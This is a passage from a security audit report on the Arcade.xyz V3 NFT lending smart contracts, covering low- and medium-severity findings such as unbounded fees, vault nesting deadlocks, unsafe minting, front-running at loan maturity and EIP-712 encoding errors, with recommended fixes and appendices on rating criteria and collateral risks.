arcade-protocol/contracts/vault/VaultFactory.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 126 127 128 129 130 RC_InvalidState(data.state); 131 132 133 134 BASIS_POINTS_DENOMINATOR; 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 8.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario A script that is used to periodically withdraw the protocol fees (calling LoanCore.withdrawProtocolFees) is updated. Due to a mistake, the to argument is left 37 Arcade.xyz V3 Security Assessment uninitialized. The script is executed, and the to argument defaults to the zero address, causing withdrawProtocolFees to transfer the protocol fees to the zero address. Recommendations Short term, add a check to verify that to does not equal the zero address to the following functions: ● VaultFactory.claimFees ● RepaymentController.redeemNote ● LoanCore.withdraw ● LoanCore.withdrawProtocolFees Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the project’s CI pipeline, pre-commit hooks, or build scripts. 38 Arcade.xyz V3 Security Assessment +9. The maximum value for FL_09 is not set by FeeController Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-9 Target: contracts/FeeController.sol Description The FeeController constructor initializes all of the maximum values for the fees defined in the FeeLookups contract except for FL_09 (LENDER_REDEEM_FEE). Because the maximum value is not set, it is possible to set any amount, with no upper bound, for that particular fee. The lender's redeem fee is used in RepaymentController’s redeemNote function to calculate the fee paid by the lender to the protocol in order to receive their funds back. If the protocol team accidentally sets the fee to 100%, all of the users' funds to be redeemed would instead be used to pay the protocol. 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 constructor() { /// @dev Vault mint fee - gross maxFees[FL_01] = 1 ether; /// @dev Origination fees - bps maxFees[FL_02] = 10_00; maxFees[FL_03] = 10_00; /// @dev Rollover fees - bps maxFees[FL_04] = 20_00; maxFees[FL_05] = 20_00; /// @dev Loan closure fees - bps maxFees[FL_06] = 10_00; maxFees[FL_07] = 50_00; maxFees[FL_08] = 10_00; } Figure 9.1: The constructor in arcade-protocol/contracts/FeeController.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); 126 127 128 129 130 RC_InvalidState(data.state); 131 if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); 39 Arcade.xyz V3 Security Assessment if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 132 133 134 BASIS_POINTS_DENOMINATOR; 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 9.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario Charlie, a member of the Arcade protocol team, has access to the privileged account that can change the protocol fees. He wants to set LENDERS_REDEEM_FEE to 5%, but he accidentally types a 0 and sets it to 50%. Users can now lose half of their funds to the new protocol fee, causing distress and lack of trust in the team. Recommendations Short term, set a maximum boundary for the FL_09 fee in FeeController’s constructor. Long term, improve the test suite to ensure that all fee-changing functions test for out-of-bounds values for all fees, not just FL_02. 40 Arcade.xyz V3 Security Assessment +10. Fees can be changed while a loan is active Severity: Low Type: Timing Difficulty: High Finding ID: TOB-ARCADE-10 Target: contracts/FeeController.sol Description All fees in the protocol are calculated using the current fees, as informed by the FeeController contract. However, fees can be changed by the team at any time, so the effective rollover and closure fees that the users will pay can change once their loans are already initialized; therefore, these fees are impossible to know in advance. For example, in the code shown in figure 10.1, the LENDER_INTEREST_FEE and LENDER_PRINCIPAL_FEE values are read when a loan is about to be repaid, but these values can be different from the values the user agreed to when the loan was initialized. The same can happen in OriginationController and other functions in RepaymentController. function _prepareRepay(uint256 loanId) internal view returns (uint256 LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); if (data.state == LoanLibrary.LoanState.DUMMY_DO_NOT_USE) revert if (data.state != LoanLibrary.LoanState.Active) revert 149 amountFromBorrower, uint256 amountToLender) { 150 151 RC_CannotDereference(loanId); 152 RC_InvalidState(data.state); 153 154 155 156 terms.proratedInterestRate); 157 158 BASIS_POINTS_DENOMINATOR; 159 BASIS_POINTS_DENOMINATOR; 160 161 162 163 } LoanLibrary.LoanTerms memory terms = data.terms; uint256 interest = getInterestAmount(terms.principal, uint256 interestFee = (interest * feeController.get(FL_07)) / uint256 principalFee = (terms.principal * feeController.get(FL_08)) / amountFromBorrower = terms.principal + interest; amountToLender = amountFromBorrower - interestFee - principalFee; Figure 10.1: The _prepareRepay function in arcade-protocol/contracts/RepaymentController.sol 41 Arcade.xyz V3 Security Assessment Exploit Scenario Lucy, the lender, and Bob, the borrower, agree on the current loan conditions and fees at a certain point in time. Some weeks later, when the time comes to repay the loan, they learn that the protocol team decided to change the fees while their loan was active. Lucy’s earnings are now different from what she expected. Recommendations Short term, consider storing (for example, in the LoanTerms structure) the fee values that both counterparties agree on when a loan is initialized, and use those local values for the full lifetime of the loan. Long term, document all of the conditions that are agreed on by the counterparties and that should be constant during the lifetime of the loan, and make sure they are preserved. Add a specific integration or fuzzing test for these conditions. 42 Arcade.xyz V3 Security Assessment +11. Asset vault nesting can lead to loss of assets Severity: Low Difficulty: High Type: Access Controls Finding ID: TOB-ARCADE-11 Target: contracts/vault/VaultFactory.sol, contracts/vault/AssetVault.sol Description Allowing asset vaults to be nested (e.g., vault A is owned by vault B, and vault B is owned by vault X, etc.) could result in a situation in which multiple asset vaults own each other. This would result in a deadlock preventing assets in the affected asset vaults from ever being withdrawn again. Asset vaults are designed to hold different types of assets, including ERC-721 tokens. The ownership of an asset vault is tracked by an accompanying ERC-721 token that is minted (figure 11.1) when the asset vault is deployed through the VaultFactory contract. 164 (uint256) { 165 166 167 mintFee); 168 169 170 171 172 173 mintFee); 174 175 176 177 } function initializeBundle(address to) external payable override returns uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); return uint256(uint160(vault)); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - Figure 11.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol To add an ERC-721 asset to an asset vault, it needs to be transferred to the asset vault’s address. Because the ownership of an asset vault is tracked by an ERC-721 token, it is possible to transfer the ownership of an asset vault to another asset vault by simply transferring the ERC-721 token representing vault ownership. To withdraw ERC-721 tokens from an asset vault, the owner (the holder of the asset vault’s ERC-721 token) needs to 43 Arcade.xyz V3 Security Assessment enable withdrawals (using the enableWithdraw function) and then call the withdrawERC721 (or withdrawBatch) function. 121 122 123 124 150 151 152 153 154 155 156 function enableWithdraw() external override onlyOwner onlyWithdrawDisabled { withdrawEnabled = true; emit WithdrawEnabled(msg.sender); } Figure 11.2: The enableWithdraw function in arcade-protocol/contracts/vault/AssetVault.sol function withdrawERC721( address token, uint256 tokenId, address to ) external override onlyOwner onlyWithdrawEnabled { _withdrawERC721(token, tokenId, to); } Figure 11.3: The withdrawERC721 function in arcade-protocol/contracts/vault/AssetVault.sol Only the owner of an asset vault can enable and perform withdrawals. Therefore, if two (or more) vaults own each other, it would be impossible for a user to enable or perform withdrawals on the affected vaults, permanently locking all assets (ERC-721, ERC-1155, ERC-20, ETH) within them. The severity of the issue depends on the UI, which was out of scope for this review. If the UI does not prevent vaults from owning each other, the severity of this issue is higher. In terms of likelihood, this issue would require a user to make a mistake (although a mistake that is far more likely than the transfer of tokens to a random address) and would require the UI to fail to detect and prevent or warn the user from making such a mistake. We therefore rated the difficulty of this issue as high. Exploit Scenario Alice decides to borrow USDC by putting up some of her NFTs as collateral: +1. Alice uses the UI to create an asset vault (vault A) and transfers five of her CryptoPunks to the asset vault. +2. The UI shows that Alice has another existing vault (vault X), which contains two Bored Apes. She wants to use these two vaults together to borrow a higher amount of USDC. She clicks on vault A and selects the “Add Asset” option. +3. The UI shows a list of assets that Alice owns, including the ERC-721 token that represents ownership of vault X. Alice clicks on “Add”, the transaction succeeds, and the vault X NFT is transferred to vault A. Vault X is now owned by vault A. 44 Arcade.xyz V3 Security Assessment +4. Alice decides to add another Bored Ape NFT that she owns to vault X. She opens the vault X page and clicks on “Add Assets”, and the list of assets that she can add shows the ERC-721 token that represents ownership of vault A. +5. Alice is confused and wonders if adding vault X to vault A worked (step 3). She decides to add vault A to vault X instead. The transaction succeeds, and now vault A owns vault X and vice versa. Alice is now unable to withdraw any of the assets from either vault. Recommendations Short term, take one of the following actions: ● Disallow the nesting of asset vaults. That is, prevent users from being able to transfer ownership of an asset vault to another asset vault. This would prevent the issue altogether. ● If allowing asset vaults to be nested is a desired feature, update the UI to prevent two or more asset vaults from owning each other (if it does not already do so). Also, update the documentation so that other integrating smart contract protocols are aware of the issue. Long term, when dealing with the nesting of assets, consider edge cases and write extensive tests that ensure these edge cases are handled correctly and that users do not lose access to their assets. Other than unit tests, we recommend writing invariants and testing them using property-based testing with Echidna. 45 Arcade.xyz V3 Security Assessment +12. Risk of locked assets due to use of _mint instead of _safeMint Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-ARCADE-12 Target: contracts/vault/VaultFactory.sol, contracts/PromissoryNote.sol Description The asset vault and promissory note ERC-721 tokens are minted via the _mint function rather than the _safeMint function. The _safeMint function includes a necessary safety check that validates a recipient contract’s ability to receive and handle ERC-721 tokens. Without this safeguard, tokens can inadvertently be sent to an incompatible contract, causing them, and any assets they hold, to become irretrievable. 164 (uint256) { 165 166 167 mintFee); 168 169 170 171 172 173 mintFee); 174 175 176 177 } function initializeBundle(address to) external payable override returns uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); return uint256(uint160(vault)); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - Figure 12.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol function mint(address to, uint256 loanId) external override returns (uint256) if (!hasRole(MINT_BURN_ROLE, msg.sender)) revert 135 { 136 PN_MintingRole(msg.sender); 137 138 139 140 return loanId; _mint(to, loanId); } Figure 12.2: The mint function in arcade-protocol/contracts/PromissoryNote.sol 46 Arcade.xyz V3 Security Assessment The _safeMint function’s built-in safety check ensures that the recipient contract has the necessary ERC721Receiver implementation, verifying the contract’s ability to receive and manage ERC-721 tokens. 258 259 260 261 262 263 264 265 266 267 268 function _safeMint( address to, uint256 tokenId, bytes memory _data ) internal virtual { _mint(to, tokenId); require( _checkOnERC721Received(address(0), to, tokenId, _data), "ERC721: transfer to non ERC721Receiver implementer" ); } Figure 12.3: The _safeMint function in openzeppelin-contracts/contracts/token/ERC721/ERC721.sol The _checkOnERC721Received method invokes the onERC721Received method on the receiving contract, expecting a return value containing the bytes4 selector of the onERC721Received method. A successful pass of this check implies that the contract is indeed capable of receiving and processing ERC-721 tokens. The _safeMint function does allow for reentrancy through the calling of _checkOnERC721Received on the receiver of the token. However, based on the order of operations in the affected functions in Arcade (figures 12.1 and 12.2), this poses no risk. Exploit Scenario Alice initializes a new asset vault by invoking the initializeBundle function of the VaultFactory contract, passing in her smart contract wallet address as the to argument. She transfers her valuable CryptoPunks NFT, intended to be used for collateral, to the newly created asset vault. However, she later discovers that her smart contract wallet lacks support for ERC-721 tokens. As a result, both her asset vault token and the CryptoPunks NFT become irretrievable, stuck within her smart wallet contract due to the absence of a mechanism to handle ERC-721 tokens. Recommendations Short term, use the _safeMint function instead of _mint in the PromissoryNote and VaultFactory contracts. The _safeMint function includes vital checks that ensure the recipient is equipped to handle ERC-721 tokens, thus mitigating the risk that NFTs could become frozen. Long term, enhance the unit testing suite. These tests should encompass more negative paths and potential edge cases, which will help uncover any hidden vulnerabilities or bugs like this one. Additionally, it is critical to test user-provided inputs extensively, covering a 47 Arcade.xyz V3 Security Assessment broad spectrum of potential scenarios. This rigorous testing will contribute to building a more secure, robust, and reliable system. 48 Arcade.xyz V3 Security Assessment +13. Borrowers cannot realize full loan value without risking default Severity: Medium Difficulty: Low Type: Timing Finding ID: TOB-ARCADE-13 Target: contracts/LoanCore.sol Description To fully capitalize on their loans, borrowers need to retain their loaned assets and the owed interest for the entire term of their loans. However, if a borrower waits until the loan’s maturity date to repay it, they become immediately vulnerable to liquidation of their collateral by the lender. As soon as the block.timestamp value exceeds the dueDate value, a lender can invoke the claim function to liquidate the borrower’s collateral. 293 294 295 // First check if the call is being made after the due date. uint256 dueDate = data.startDate + data.terms.durationSecs; if (dueDate >= block.timestamp) revert LC_NotExpired(dueDate); Figure 13.1: A snippet of the claim function in arcade-protocol/contracts/LoanCore.sol Owing to the inherent nature of the blockchain, achieving precise synchronization between the block.timestamp and the dueDate is practically impossible. Moreover, repaying a loan before the dueDate would result in a loss of some of the loan’s inherent value because the protocol’s interest assessment design does not refund any part of the interest for early repayment. In a scenario in which block.timestamp is greater than dueDate, a lender can preempt a borrower’s loan repayment attempt, invoke the claim function, and liquidate the borrower’s collateral. Frequently, collateral will be worth more than the loaned assets, giving lenders an incentive to do this. Given the protocol’s interest assessment design, the Arcade team should implement a grace period following the maturity date where no additional interest is expected to be assessed beyond the period agreed to in the loan terms. This buffer would give the borrower an opportunity to fully capitalize on the term of their loan without the risk of defaulting and losing their collateral. 49 Arcade.xyz V3 Security Assessment Exploit Scenario Alice, a borrower, takes out a loan from Eve using Arcade’s NFT lending protocol. Alice deposits her rare CryptoPunk as collateral, which is more valuable than the assets loaned to her, so that her position is over-collateralized. Alice plans to hold on to the lent assets for the entire duration of the loan period in order to maximize her benefit-to-cost ratio. Eve, the lender, is monitoring the blockchain for the moment when the block.timestamp is greater than or equal to the dueDate so that she can call the claim function and liquidate Alice’s CryptoPunk. As soon as the loan term is up, Alice submits a transaction to the repay function, and Eve front-runs that transaction with her own call to the claim function. As a result, Eve is able to liquidate Alice’s CryptoPunk collateral. Recommendations Short term, introduce a grace period after the loan's maturity date during which the lender cannot invoke the claim function. This buffer would give the borrower sufficient time to repay the loan without the risk of immediate collateral liquidation. Long term, revise the protocol's interest assessment design to allow a portion of the interest to be refunded in cases of early repayment. This change could reduce the incentive for borrowers to delay repayment until the last possible moment. Additionally, provide better education for borrowers on how the lending protocol works, particularly around critical dates and actions, and improve communication channels for borrowers to raise concerns or seek clarification. 50 Arcade.xyz V3 Security Assessment +14. itemPredicates encoded incorrectly according to EIP-712 Severity: Low Difficulty: Low Type: Configuration Finding ID: TOB-ARCADE-14 Target: contracts/OriginationController.sol Description The itemPredicates parameter is not encoded correctly, so the signer cannot see the verifier address when signing. The verifier address receives each batch of listed assets to check them for correctness and existence, which is vital to ensuring the security and integrity of the lending transaction. According to EIP-712, structured data should be hashed in conjunction with its typeHash. The following is the hashStruct function as defined in EIP-712: hashStruct(s : 𝕊) = keccak256(typeHash ‖ encodeData(s)) where typeHash = keccak256(encodeType(typeOf(s))) In the protocol, the recoverItemsSignature function hashes an array of Predicate[] structs that are passed in as the itemPredicates argument. The function encodes and hashes the array without adding the Predicate typeHash to each member of the array. The hashed output of that operation is then included in the _ITEMS_TYPEHASH variable as a bytes32 type, referred to as itemsHash. 208 209 210 211 212 213 214 (bytes32 sighash, address externalSigner) = recoverItemsSignature( loanTerms, sig, nonce, neededSide, keccak256(abi.encode(itemPredicates)) ); Figure 14.1: A snippet of the initializeLoanWithItems function in arcade-protocol/contracts/OriginationController.sol keccak256( bytes32 private constant _ITEMS_TYPEHASH = 85 86 87 88 proratedInterestRate,uint256 principal,address collateralAddress,bytes32 itemsHash,address payableCurrency,bytes32 affiliateCode,uint160 nonce,uint8 side)" 89 // solhint-disable max-line-length "LoanTermsWithItems(uint32 durationSecs,uint32 deadline,uint160 ); 51 Arcade.xyz V3 Security Assessment Figure 14.2: The _ITEMS_TYPEHASH variable in arcade-protocol/contracts/OriginationController.sol However, this method of encoding an array of structs is not consistent with the EIP-712 guidelines, which stipulates the following: “The array values are encoded as the keccak256 hash of the concatenated encodeData of their contents (i.e., the encoding of SomeType[5] is identical to that of a struct containing five members of type SomeType). The struct values are encoded recursively as hashStruct(value). This is undefined for cyclical data.” Therefore, the protocol should iterate over the itemPredicates array, encoding each Predicate instance separately with its respective typeHash. Exploit Scenario Alice creates a loan offering that takes CryptoPunks as collateral. She submits the loan terms to the Arcade protocol. Bob, a CryptoPunk holder, navigates the Arcade UI to accept Alice’s loan terms. An EIP-712 signature request appears in MetaMask for Bob to sign. Bob cannot validate whether the message he is signing uses the CryptoPunk verifier contract because that information is not included in the hash. Recommendations Short term, adjust the encoding of itemPredicates to comply with EIP-712 standards. Have the code iterate through the itemPredicates array and encode each Predicate instance separately with its associated typeHash. Additionally, refactor the _ITEMS_TYPEHASH variable so that the Predicate typeHash definition is appended to it and replace the bytes32 itemsHash parameter with Predicate[] items. This revision will allow the signer to see the verifier address of the message they are signing, ensuring the validity of each batch of items, in addition to complying with the EIP-712 standard. Long term, strictly adhere to established Ethereum protocols such as EIP-712. These standards exist to ensure interoperability, security, and predictable behavior in the Ethereum ecosystem. Violating these norms can lead to unforeseen security vulnerabilities. 52 Arcade.xyz V3 Security Assessment +15. The fee values can distort the incentives for the borrowers and lenders Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-15 Target: contracts/FeeController.sol Description Arcade V3 contains nine fee settings. Six of these fees are to be paid by the lender, two are to be paid by the borrower, and the remaining fee is to be paid by the borrower if they decide to mint a new vault for their collateral. Depending on the values of these settings, the incentives can change for both loan counterparties. For example, to create a new loan, both the borrower and lender have to pay origination fees, and eventually, the loan must be rolled over, repaid, or defaulted. In the first case, both the new lender and borrower pay rollover fees; note that the original lender pays no fees at all for closing the loan. In the second case, the lender pays interest fees and principal fees on closing the loan. Finally, if the loan is defaulted, the lender pays a default fee to liquidate the collateral. The various fees paid based on the outcome of the loan can result in an interesting incentive game for investors in the protocol, depending on the actual values of the fee settings. If the lender rollover fee is cheaper than the origination fee, investors may be incentivized to roll over existing loans instead of creating new ones, benefiting the original lenders by saving them the closing fees, and harming the borrowers by indirectly raising the interest rates to compensate. Similarly, if the lender rollover fees are higher than the closing fees, lenders will be less incentivized to rollover loans. In summary, having such fine control over possible fee settings introduces hard-to-predict incentives scenarios that can scare users away or cause users who do not account for fees to inadvertently lose profits. Recommendations Short term, clearly inform borrowers and lenders of all of the existing fees and their current values at the moment a loan is opened, as well as the various possible outcomes, including the expected net profits if the loan is repaid, rolled over, defaulted, or redeemed. Long term, add interactive ways for users to calculate their expected profits, such as a loan simulator. 53 Arcade.xyz V3 Security Assessment +16. Malicious borrowers can use forceRepay to grief lenders Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-ARCADE-16 Target: contracts/RepaymentController.sol Description A malicious borrower can grief a lender by calling the forceRepay function instead of the repay function; doing so would allow the borrower to pay less in gas fees and require the lender to perform a separate transaction to retrieve their funds (using the redeemNote function) and to pay a redeem fee. At any time after the loan is set and before the lender claims the collateral if the loan is past its due date, the borrower has to pay their full debt back in order to recover their assets. For doing so, there are two functions in RepaymentController: repay and forceRepay. The difference between them is that the latter transfers the tokens to the LoanCore contract instead of directly to the lender. It is meant to allow the borrower to pay their obligations when the lender cannot receive tokens for any reason. For the lender to get their tokens back in this scenario, they must call the redeemNote function in RepaymentController, which in turn calls LoanCore.redeemNote, which transfers the tokens to an address set by the lender in the call. Because the borrower is free to decide which function to call to repay their debt, they can arbitrarily decide to do so via forceRepay, obligating the lender to send a transaction (with its associated gas fees) to recover their tokens. Additionally, depending on the configuration of the protocol, it is possible that the lender has to pay an additional fee (LENDER_REDEEM_FEE) to get back their own tokens, cutting their profits with no chance to opt out. 126 127 128 129 130 RC_InvalidState(data.state); 131 132 133 134 BASIS_POINTS_DENOMINATOR; function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 54 Arcade.xyz V3 Security Assessment 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 16.1: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Note that, from the perspective of the borrower, it is actually cheaper to call forceRepay than repay because of the gas saved by not transferring the tokens to the lender and not burning one of the promissory notes. Exploit Scenario Bob has to pay back his loan, and he decides to do so via forceRepay to save gas in the transaction. Lucy, the lender, wants her tokens back. She is now forced to call redeemNote to get them. In this transaction, she lost the gas fees that the borrower would have paid to send the tokens directly to her, and she has to pay an additional fee (LENDER_REDEEMER_FEE), causing her to receive less value from the loan than she originally expected. Recommendations Short term, remove the incentive (the lower gas cost) for the borrower to call forceRepay instead of repay. Consider taking one of the following actions: ● Force the lender to always pull their funds using the redeemNote function. This can be achieved by removing the repay function and requiring the borrower to call forceRepay. ● Remove the forceRepay function and modify the repay function so that it transfers the funds to the lender in a try/catch statement and creates a redeem note (which the lender can exchange for their funds using the redeemNote function) only if that transfer fails. Long term, when designing a smart contract protocol, always consider the incentives for each party to perform actions in the protocol, and avoid making an actor pay for the mistakes or maliciousness of others. By thoroughly documenting the incentives structure, flaws can be spotted and mitigated before the protocol goes live. 55 Arcade.xyz V3 Security Assessment A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system 56 Arcade.xyz V3 Security Assessment Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. 57 Arcade.xyz V3 Security Assessment B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Decentralization The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades Documentation The presence of comprehensive and readable codebase documentation Transaction Ordering Risks Low-Level Manipulation Testing and Verification Rating Criteria Rating Strong The system’s resistance to front-running attacks The justified use of inline assembly and low-level calls The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. 58 Arcade.xyz V3 Security Assessment Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. 59 Arcade.xyz V3 Security Assessment C. Code Quality Recommendations The following recommendations are not associated with specific vulnerabilities. However, they enhance code readability and may prevent the introduction of vulnerabilities in the future. ● Make fee names more explicit and add getters for each fee. The names used for the various fee values (e.g., FL_0x) do not clearly describe the fees. Readers of the code will have to navigate between the current contract and the FeeLookups contract to determine the type of each fee. Additionally, adding custom getter functions to the FeeController contract (e.g., getLenderFee()) can simplify the system by allowing FeeLookups to be removed from the inheritance chain of the OriginationController, RepaymentController, and VaultFactory contracts. ● Ensure that verifiers follow the provided documentation. According to the _runPredicatesCheck() NatSpec documentation, the function reverts if a verifier returns false. However, some of the implemented verifiers can return true or false or instead revert. Even though this discrepancy has no direct impact on the system, an external entity interacting with Arcade may be confused by getting an IV_xxx error when they expected an OC_PredicateFailed error. ● Ensure that structure names are unique throughout the system. There are two structures named SignatureItem: one in ArtBlocksVerifier and the other in ItemsVerifier. Even though they are defined in different namespaces, it can be confusing to identify them because they have different members. Moreover, in the provided test suite, they are referred to as ArtBlocksItem and SignatureItem, respectively, making it more confusing for readers. ● Use automatically generated getters for public variables. OriginationController defines the mappings allowedVerifiers, allowedCurrencies, and allowedCollateral as public. The Solidity compiler automatically adds getters for these variables, but manual getters were added by the team (isAllowedVerifier, isAllowedCurrency, and isAllowedCollateral) with no additional functionality from the default getters. ● Ensure that comments in the code reflect the code’s intended behavior. Here are two examples of off-by-one comments in OriginationController: OriginationController.sol#L669 and OriginationController.sol#L673. ● Ensure that contract names match their filenames. The verifiers/ItemsVerifier.sol file contains the ArcadeItemsVerifier contract. 60 Arcade.xyz V3 Security Assessment ● Remove variables that are never used or are used only once. For example, id in ArcadeItemsVerifier.verifyPredicates() is used only once in the function body. ● Avoid redefining constants. FL_01 in FeeLookups was redefined in VaultFactory. ● Remove unneeded or unreachable code. For example, the else condition in the ArcadeItemsVerifier.verifyPredicates function can never be reached because abi.decode will revert for incorrect CollateralType enum values. 61 Arcade.xyz V3 Security Assessment D. Risks with Approving NFTs for Use as Collateral The Arcade protocol aims to whitelist NFT contracts to be used as collateral to back loans. These NFTs could introduce problems that could allow attackers to steal funds or otherwise impede the correct functioning of the system. We recommend that the Arcade team exercise caution in approving NFTs for use as collateral to ensure that the system keeps working correctly and that no user loses access to funds. Follow these guidelines when considering which NFTs to approve: ● Tokens should never be upgradeable. Upgradeable ERC-721 tokens can introduce substantial risks when used as collateral in an NFT lending protocol. Therefore, smart contract developers should either prevent upgradeable tokens from being used as collateral or implement robust safeguards against the associated risks. Some of these risks include the following: ○ Unpredictable token logic changes: Because the contract owner or a designated admin can alter the logic of an upgradeable token, the token’s behavior could change unpredictably during the loan period. This could affect the value of the collateral, render it worthless, or prevent its return. ○ Centralization and minimized trust: Upgradeable contracts introduce an element of centralization, as the power to upgrade the contract typically lies with a specific address or addresses. This could be a risk in a decentralized environment, where the ethos is to minimize trust in individual parties. The contract's owner could, maliciously or unintentionally, make an upgrade that jeopardizes the token's role as collateral. ○ Complexity and potential bugs: Upgradeable contracts are more complex than their non-upgradeable counterparts. This added complexity increases the risk of bugs and vulnerabilities, which could be exploited to the detriment of Arcade’s lending protocol and its users. ● Tokens should not have a self-destruct capability. The self-destruct function allows a contract to be destroyed by its owner, which essentially removes the contract's bytecode from the Ethereum blockchain, making it nonfunctional. Here are some of the risks of using self-destructible tokens as collateral: ○ Total loss of collateral: If an ERC-721 token used as collateral has a self-destruct function and that function is invoked during the loan's lifecycle, the token will be rendered worthless. The borrower could default on their loan and the lender would not be able to claim the collateral, leading to a complete loss. 62 Arcade.xyz V3 Security Assessment ○ Damage to the integrity of Arcade’s lending protocol: Such tokens can undermine the integrity of the lending protocol. Lenders will be unwilling to participate if they believe that the collateral could self-destruct, making it harder for the protocol to attract and retain users. ○ Lack of recourse: In traditional finance, there are legal protections to prevent the destruction of assets used as collateral. In contrast, in the blockchain world, there is no way to recover a contract once it has self-destructed, making it a significant risk for lenders. ● Tokens should not be pausable. A "pause" function, when present in a smart contract, allows certain privileged accounts such as contract owners and administrators to stop specific activities such as token transfers for a period of time. Although this functionality can be useful for halting activities in case of a detected vulnerability or bug, it can pose significant risks to an NFT lending protocol, such as the following: ○ Possible prevention of repayment and collateral retrieval: If a token used as collateral is paused, that token cannot be transferred. This means that a borrower could not repay their loan and retrieve their collateral, and similarly, a lender could not claim the collateral if the loan defaults. ○ Market manipulation: In a worst-case scenario, a malicious token owner could strategically pause and unpause a token, disrupting the market and possibly manipulating the token’s value. ● Tokens should not be burnable by some authorized third-party. Tokens that can be burned by a third-party or token admin should not be permitted as collateral in an NFT lending protocol. “Burning” is a process by which tokens are permanently removed from circulation, thereby reducing the total supply of tokens. Although this feature can be useful in certain contexts, it can introduce the following risks when used in an NFT lending protocol: ○ Total loss of collateral: If the token used as collateral can be burned by an admin or third party, it could be burned during the duration of the loan, which would leave the lender unprotected in the case of a default. ○ Loan-to-value manipulation: Those with the ability to burn tokens could engage in manipulative behaviors that disrupt the loan-to-value ratio, such as artificially influencing a token’s scarcity and thereby its market value, thus leading to over-collateralization or under-collateralization. ● Tokens should not hold or have access to other assets. Tokens can be structured to hold or interact with other assets on the blockchain. An ERC-721 token can be a 63 Arcade.xyz V3 Security Assessment "wrapper" for specific ERC-20 tokens, generate yields from a DeFi protocol, or represent in-game characters with their own assets. Using them as collateral in lending protocol comes with the following risks: ○ Value fluctuation: If the token holds or has access to other assets, its value can change during the loan period if the value of the underlying assets changes. If a collateral changes value, it may no longer cover the value of the loan, creating significant risk for the lender. ○ Asset removal or addition: If the token allows assets to be added to or removed from it, the value of the collateral could be altered during the life cycle of the loan. A borrower or a third party could remove assets from the collateral, decreasing the collateral’s value; the lender and the protocol would have no means to prevent this. ○ Valuation complexity: Valuing tokens that hold other assets is more complex than valuing simpler tokens. Some assets are interest bearing, some undergo rebasing, and most are traded on public markets. The complexities involved in accurately determining the value of such tokens 